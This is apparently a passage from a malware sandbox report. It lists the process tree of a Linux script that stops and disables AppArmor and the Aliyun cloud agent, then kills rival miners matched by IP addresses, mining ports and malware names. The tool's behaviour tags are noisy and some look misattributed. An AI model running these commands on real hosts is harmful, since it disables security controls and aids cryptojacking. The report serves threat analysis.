    systemctl -p Triggers show avahi-daemon.socket
    3⤵
    PID:1787
- - /bin/systemctl
    systemctl -p Triggers show cups.socket
    3⤵
    PID:1788
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    PID:1789
- - /bin/systemctl
    systemctl -p Triggers show saned.socket
    3⤵
    PID:1790
- - /bin/systemctl
    systemctl -p Triggers show snapd.socket
    3⤵
    PID:1791
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    PID:1792
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    PID:1793
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    PID:1794
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    PID:1795
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    PID:1796
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    PID:1797
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    PID:1798
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    PID:1799
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    PID:1800
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    PID:1801
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    PID:1802
- - /bin/systemctl
    systemctl -p Triggers show uuidd.socket
    3⤵
    PID:1803
- /usr/local/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1770
- /usr/local/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1770
- /usr/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  PID:1770
- /usr/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1770
- /sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1770
- /bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1770
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  PID:1815
- - /lib/systemd/systemd-sysv-install
    /lib/systemd/systemd-sysv-install disable apparmor
    3⤵
    PID:1816
  - - /usr/bin/getopt
      getopt -o r: --long root: -- disable apparmor
      4⤵
      PID:1817
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d apparmor defaults
      4⤵
      PID:1818
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1819
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1819
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1819
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1819
    - - /sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1819
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1819
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d apparmor disable
      4⤵
      Flushes firewall rules
      PID:1840
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1841
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1841
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1841
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1841
    - - /sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1841
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1841
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:1882
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1883
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1884
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    PID:1885
- - /bin/systemctl
    systemctl -p Triggers show acpid.socket
    3⤵
    - Disables AppArmor
    PID:1889
- - /bin/systemctl
    systemctl -p Triggers show apport-forward.socket
    3⤵
    - Disables AppArmor
    PID:1890
- - /bin/systemctl
    systemctl -p Triggers show avahi-daemon.socket
    3⤵
    - Disables AppArmor
    PID:1891
- - /bin/systemctl
    systemctl -p Triggers show cups.socket
    3⤵
    PID:1892
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    PID:1893
- - /bin/systemctl
    systemctl -p Triggers show saned.socket
    3⤵
    PID:1894
- - /bin/systemctl
    systemctl -p Triggers show snapd.socket
    3⤵
    PID:1895
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Disables AppArmor
    PID:1896
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Disables AppArmor
    PID:1897
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Disables AppArmor
    PID:1898
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Disables AppArmor
    PID:1899
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Disables AppArmor
    PID:1900
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    PID:1901
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Disables AppArmor
    PID:1902
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Disables AppArmor
    PID:1903
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    PID:1904
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Disables AppArmor
    PID:1905
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    PID:1906
- - /bin/systemctl
    systemctl -p Triggers show uuidd.socket
    3⤵
    - Disables AppArmor
    PID:1907
- /usr/local/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  PID:1882
- /usr/local/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1882
- /usr/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  PID:1882
- /usr/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  PID:1882
- /sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1882
- /bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1882
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  PID:1908
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1913
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1912
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1911
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1910
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1918
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1917
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1916
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1915
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1924
- /bin/grep
  grep -v -
  2⤵
  PID:1923
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1922
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1921
- /bin/grep
  grep :443
  2⤵
  PID:1920
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1930
- /bin/grep
  grep -v -
  2⤵
  PID:1929
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1928
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1927
- /bin/grep
  grep :23
  2⤵
  PID:1926
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1936
- /bin/grep
  grep -v -
  2⤵
  PID:1935
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1934
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1933
- /bin/grep
  grep :443
  2⤵
  PID:1932
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1942
- /bin/grep
  grep -v -
  2⤵
  PID:1941
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1940
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1939
- /bin/grep
  grep :143
  2⤵
  PID:1938
- /bin/grep
  grep -v -
  2⤵
  PID:1947
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1946
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1945
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1948
- /bin/grep
  grep :2222
  2⤵
  PID:1944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1954
- /bin/grep
  grep -v -
  2⤵
  PID:1953
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1952
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1951
- /bin/grep
  grep :3333
  2⤵
  PID:1950
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1960
- /bin/grep
  grep -v -
  2⤵
  PID:1959
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1958
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1957
- /bin/grep
  grep :3389
  2⤵
  PID:1956
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1966
- /bin/grep
  grep -v -
  2⤵
  PID:1965
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1964
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1963
- /bin/grep
  grep :5555
  2⤵
  PID:1962
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1972
- /bin/grep
  grep -v -
  2⤵
  PID:1971
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1970
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1969
- /bin/grep
  grep :6666
  2⤵
  PID:1968
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1978
- /bin/grep
  grep -v -
  2⤵
  PID:1977
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1976
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1975
- /bin/grep
  grep :6665
  2⤵
  PID:1974
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1984
- /bin/grep
  grep -v -
  2⤵
  PID:1983
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1982
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1981
- /bin/grep
  grep :6667
  2⤵
  PID:1980
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1990
- /bin/grep
  grep -v -
  2⤵
  PID:1989
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1988
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1987
- /bin/grep
  grep :7777
  2⤵
  PID:1986
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1996
- /bin/grep
  grep -v -
  2⤵
  PID:1995
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1994
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1993
- /bin/grep
  grep :8444
  2⤵
  PID:1992
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2002
- /bin/grep
  grep -v -
  2⤵
  PID:2001
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:2000
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1999
- /bin/grep
  grep :3347
  2⤵
  PID:1998
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2007
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2006
- /bin/grep
  grep :3333
  2⤵
  PID:2005
- /bin/grep
  grep -v grep
  2⤵
  PID:2004
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2003
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2012
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2011
- /bin/grep
  grep :5555
  2⤵
  PID:2010
- /bin/grep
  grep -v grep
  2⤵
  PID:2009
- /bin/ps
  ps aux
  2⤵
  PID:2008
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2017
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2016
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:2015
- /bin/grep
  grep -v grep
  2⤵
  PID:2014
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2013
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2022
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2021
- /bin/grep
  grep log_
  2⤵
  PID:2020
- /bin/grep
  grep -v grep
  2⤵
  PID:2019
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2018
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2027
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2026
- /bin/grep
  grep systemten
  2⤵
  PID:2025
- /bin/grep
  grep -v grep
  2⤵
  PID:2024
- /bin/ps
  ps aux
  2⤵
  PID:2023
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2032
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:2033
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:2033
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:2033
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:2033
- - /sbin/kill
    kill -9 14
    3⤵
    PID:2033
- - /bin/kill
    kill -9 14
    3⤵
    - Reads CPU attributes
    PID:2033
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2031
- /bin/grep
  grep netns
  2⤵
  PID:2030
- /bin/grep
  grep -v grep
  2⤵
  PID:2029
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2028
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2038
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2037
- /bin/grep
  grep voltuned
  2⤵
  PID:2036
- /bin/grep
  grep -v grep
  2⤵
  PID:2035
- /bin/ps
  ps aux
  2⤵
  PID:2034
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2043
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2042
- /bin/grep
  grep darwin
  2⤵
  PID:2041
- /bin/grep
  grep -v grep
  2⤵
  PID:2040
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2039
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2048
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2047
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:2046
- /bin/grep
  grep -v grep
  2⤵
  PID:2045
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2044
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2053
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2052
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:2051
- /bin/grep
  grep -v grep
  2⤵
  PID:2050
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2049
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2058
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2057
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:2056
- /bin/grep
  grep -v grep
  2⤵
  PID:2055
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2054
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2063
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2062
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:2061
- /bin/grep
  grep -v grep
  2⤵
  PID:2060
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2059
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2068
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2067
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:2066
- /bin/grep
  grep -v grep
  2⤵
  PID:2065
- /bin/ps
  ps aux
  2⤵
  PID:2064
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2073
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2072
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:2071
- /bin/grep
  grep -v grep
  2⤵
  PID:2070
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2069
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2078
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2077
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:2076
- /bin/grep
  grep -v grep
  2⤵
  PID:2075
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2074
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2083
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2082
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:2081
- /bin/grep
  grep -v grep
  2⤵
  PID:2080
- /bin/ps
  ps aux
  2⤵
  PID:2079
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2088
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2087
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:2086
- /bin/grep
  grep -v grep
  2⤵
  PID:2085
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2084
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2093
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2092
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:2091
- /bin/grep
  grep -v grep
  2⤵
  PID:2090
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2089
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2098
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2097
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:2096
- /bin/grep
  grep -v grep
  2⤵
  PID:2095
- /bin/ps
  ps aux
  2⤵
  PID:2094
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2103
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2102
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:2101
- /bin/grep
  grep -v grep
  2⤵
  PID:2100
- /bin/ps
  ps aux
  2⤵
  PID:2099
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2108
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2107
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:2106
- /bin/grep
  grep -v grep
  2⤵
  PID:2105
- /bin/ps
  ps aux
  2⤵
  PID:2104
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2113
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2112
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:2111
- /bin/grep
  grep -v grep
  2⤵
  PID:2110
- /bin/ps
  ps aux
  2⤵
  PID:2109
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2118
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2117
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:2116
- /bin/grep
  grep -v grep
  2⤵
  PID:2115
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2114
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2123
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2122
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:2121
- /bin/grep
  grep -v grep
  2⤵
  PID:2120
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2119
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2128
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2127
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2126
- /bin/grep
  grep -v grep
  2⤵
  PID:2125
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2124
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2133
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2132
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:2131
- /bin/grep
  grep -v grep
  2⤵
  PID:2130
- /bin/ps
  ps aux
  2⤵
  PID:2129
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2138
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2137
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:2136
- /bin/grep
  grep -v grep
  2⤵
  PID:2135
- /bin/ps
  ps aux
  2⤵
  PID:2134
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2143
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2142
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:2141
- /bin/grep
  grep -v grep
  2⤵
  PID:2140
- /bin/ps
  ps aux
  2⤵
  PID:2139
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2148
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2147
- /bin/grep
  grep svc
  2⤵
  PID:2146
- /bin/grep
  grep -v grep
  2⤵
  PID:2145
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2144
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2153
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2152
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:2151
- /bin/grep
  grep -v grep
  2⤵
  PID:2150
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2149
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2158
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2157
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:2156
- /bin/grep
  grep -v grep
  2⤵
  PID:2155
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2154
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2163
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2162
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:2161
- /bin/grep
  grep -v grep
  2⤵
  PID:2160
- /bin/ps
  ps aux
  2⤵
  PID:2159
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2168
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2167
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:2166
- /bin/grep
  grep -v grep
  2⤵
  PID:2165
- /bin/ps
  ps aux
  2⤵
  PID:2164
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2173
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2172
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:2171
- /bin/grep
  grep -v grep
  2⤵
  PID:2170
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2169
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2178
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2177
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:2176
- /bin/grep
  grep -v grep
  2⤵
  PID:2175
- /bin/ps
  ps aux
  2⤵
  PID:2174
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2183
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2182
- /bin/grep
  grep http_0xCC030
  2⤵
  - Disables SELinux
  PID:2181
- /bin/grep
  grep -v grep
  2⤵
  PID:2180
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2179
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2188
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2187
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:2186
- /bin/grep
  grep -v grep
  2⤵
  PID:2185
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2184
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2193
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2192
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:2191
- /bin/grep
  grep -v grep
  2⤵
  PID:2190
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2189
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2198
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2197
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:2196
- /bin/grep
  grep -v grep
  2⤵
  PID:2195
- /bin/ps
  ps aux
  2⤵
  PID:2194
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2203
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2202
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2201
- /bin/grep
  grep -v grep
  2⤵
  PID:2200
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2199
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2207
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2208
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2206
- /bin/grep
  grep -v grep
  2⤵
  PID:2205
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2204
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2212
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2211
- /bin/grep
  grep -v grep
  2⤵
  PID:2210
- /bin/ps
  ps aux
  2⤵
  PID:2209
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2217
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2216
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2215
- /bin/grep
  grep -v grep
  2⤵
  PID:2214
- /bin/ps
  ps aux
  2⤵
  PID:2213
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2222
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2221
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2220
- /bin/grep
  grep -v grep
  2⤵
  PID:2219
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2218
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2227
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2226
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2225
- /bin/grep
  grep -v grep
  2⤵
  PID:2224
- /bin/ps
  ps aux
  2⤵
  PID:2223
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2232
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2231
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2230
- /bin/grep
  grep -v grep
  2⤵
  PID:2229
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2228
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2237
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2236
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2235
- /bin/grep
  grep -v grep
  2⤵
  PID:2234
- /bin/ps
  ps aux
  2⤵
  PID:2233
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2242
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2241
- /bin/grep
  grep rkebbwgqpl4npmm
